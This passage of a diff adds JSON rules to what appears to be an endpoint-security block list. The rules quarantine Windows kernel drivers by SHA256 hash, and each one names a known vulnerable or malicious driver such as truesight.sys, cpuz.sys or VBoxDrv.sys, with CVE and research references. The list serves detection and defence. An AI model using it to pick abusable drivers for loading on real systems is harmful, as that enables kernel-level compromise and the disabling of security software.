[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e720683c-966c-53fc-a26d-795070b4fef3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822918Z", + 
"creation_date": "2026-03-23T11:45:30.822920Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822925Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e53dabeff15be08a23fb7eccfd82fd1dbdc3de857b28209dac3b4b2bdc3cb13a", + "comment": "Vulnerable Kernel Driver (aka SBIOSIO64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7363871-e97b-5793-b2aa-fa4e46e6cdee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983920Z", + "creation_date": "2026-03-23T11:45:29.983922Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983928Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "46ffe559f5a8f6bd611ac5a9264edf92d8449d8d31b2ddf6b2add5971e309c56", + "comment": "Vulnerable Kernel Driver (aka iomem64.sys) [https://www.loldrivers.io/drivers/04d377f9-36e0-42a4-8d47-62232163dc68/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e736570e-0dd2-529b-8304-cd93ce375a2e", + "test_maturity_current_count": 
0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.828860Z", + "creation_date": "2026-03-23T11:45:30.828862Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.828868Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0f5964b0bb4036485e8424006a47f68e1a6a5b65fbcb6a9381b2915dbc54bd4d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e73ba48e-a6c4-50d7-8926-dff9d4d933ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140856Z", + "creation_date": "2026-03-23T11:45:31.140858Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140864Z", + "rule_level": 
null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7dbb58bc5a88defdbb20983a858b122df1c92f3a1be88879e00268db37d380cc", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e757c61d-9f0a-5a31-9d47-eb773cdd095b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.984407Z", + "creation_date": "2026-03-23T11:45:29.984409Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.984414Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cfab93885e5129a86d13fd380d010cc8c204429973b776ab1b472d84a767930f", + "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e75b4f39-1641-5bfd-8c66-d30636c9c636", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488828Z", + "creation_date": "2026-03-23T11:45:31.488830Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488835Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "17d87146257a05e71e2b0c14c753a7a23b24f580684c20744328ee2c17c4a5d4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7633e6d-d04a-5168-bd96-055676fff9e6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.489993Z", + "creation_date": "2026-03-23T11:45:31.489997Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490006Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66389eeb0403a8b8a5e9c86d55015270091a8ce564f7a96daa49e422a5bf12ad", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e766c713-9b84-53c3-a628-0a84a267b9c2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474987Z", + "creation_date": "2026-03-23T11:45:30.474991Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475000Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "31fcf4cbe7de8a5d563144e577324f9206bcc24ddf17473b436f1c693dff0ee7", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e76c5e47-70cc-5135-a90c-61db39f43c05", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.610492Z", + "creation_date": "2026-03-23T11:45:29.610494Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.610499Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "60b163776e7b95e0c2280d04476304d0c943b484909131f340e3ce6045a49289", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e783780f-0df8-5d9e-8e38-06e077343de8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832003Z", + "creation_date": "2026-03-23T11:45:30.832005Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832011Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6a4c86dc9c64509ec1fd2cbbc9ab3796d9e22987e08be41a82f9171b88a85c01", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e78f66d7-b61e-5b12-8b1c-66e3a6bd661c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608562Z", + "creation_date": "2026-03-23T11:45:29.608564Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608569Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "597e7d5feb149d9087888926d1454dc06f1078ab18c948b44f090910da8645f8", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7916315-04a3-578c-a611-3e9f4b561540", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488152Z", + "creation_date": "2026-03-23T11:45:31.488154Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488159Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4157456f9f9b17f3cec65c7b4c0132a9607b95d84b7c91a78531f498b83c7bc5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e79954df-3256-514f-a4b9-f4170bc6e53b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480236Z", + "creation_date": "2026-03-23T11:45:31.480240Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480250Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "59234802fe72df8ee65caa625efdbe3cfaeb53d1c9872dc2235947ba03f6a027", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e79e1b11-dccd-5bc9-88b9-ec626201d53a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145262Z", + "creation_date": "2026-03-23T11:45:32.145266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145275Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "77225a99b2e0e2b4007fb2f5a96d356e13deab45b9ef54c175d5452de8a211a7", + "comment": "Malicious Kernel Driver (aka driver_77225a99.sys) [https://www.loldrivers.io/drivers/5fb86651-c152-404a-9a2f-0f54b0d2bb55/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7a5bc55-8cdb-5f1f-9211-3e55da1877b1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826532Z", + "creation_date": "2026-03-23T11:45:30.826534Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826539Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "562d931e327967192b2c614968ee90b4e0e1f226c152800d2f6df4e602147203", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7a98455-6ffb-50cd-9711-71ce7e73ceae", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151264Z", + "creation_date": "2026-03-23T11:45:31.151266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151271Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89138b34b0e057db07d7c6e56992aca0f30faafcce9fe511dcab7d14f3f41279", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7b10f8f-9b89-5f48-a473-d74180df6515", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.824904Z", + "creation_date": "2026-03-23T11:45:31.824908Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.824917Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ab0442d9b69f0087e4acb3bda60422061c41ded7cf5e197a2bedefc98655993", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7b85012-0bfe-535d-a54b-254e5e16365c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477643Z", + "creation_date": "2026-03-23T11:45:31.477647Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f22701e787985e0335480e616a36bd33d7df96272a2afa1b812430cfc449a53f", 
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7cff119-2db4-5ec5-8dae-dd42dcdf982d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820160Z", + "creation_date": "2026-03-23T11:45:30.820162Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820167Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f72dbb2a818ba47ca03ffbe50d211050210699c25caec3b97ca960d7286d4b6a", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7d01e33-9469-5460-bbfb-8420062115aa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + 
"last_update": "2026-03-23T11:45:29.972560Z", + "creation_date": "2026-03-23T11:45:29.972562Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972568Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b4c7d3820fe08400a7791e2556132b902a9bbadc1942de57077ecb9d21bf47a", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7d1fbe6-7be0-5f90-8f3f-c904fc97f431", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475702Z", + "creation_date": "2026-03-23T11:45:30.475705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475714Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "89698cad598a56f9e45efffd15d1841e494a2409cc12279150a03842cd6bb7f3", + "comment": "Malicious Kernel Driver (aka wfshbr64.sys) [https://www.loldrivers.io/drivers/ddf661c0-7dfc-4c26-89c5-00cd6a81a139/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7dce429-7080-5bc4-b6fb-d9a90041bb39", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476598Z", + "creation_date": "2026-03-23T11:45:31.476601Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476611Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0cc0132730115b65bfda0adb4de8a1a1c035b1d0eb2384873cf3a5c3cb2efb14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7e2f8c9-b0df-5860-9bf4-4ff8f8730a71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477055Z", + "creation_date": "2026-03-23T11:45:30.477058Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477067Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e0e65416f40cf3bea00d77515a7d8ab508d3aa2b7b622a8799a49635c4d5dbb5", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7ea15a4-f24f-50bb-b25b-5d64d2e1f9e9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809063Z", + "creation_date": "2026-03-23T11:45:31.809065Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809071Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0213810e01cabf7f296d17d4bdd768a644ac5ed46ed03428c45fa986a0ece28e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e7ea4f9a-1560-50f9-9a13-0b54c0ad1e4e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
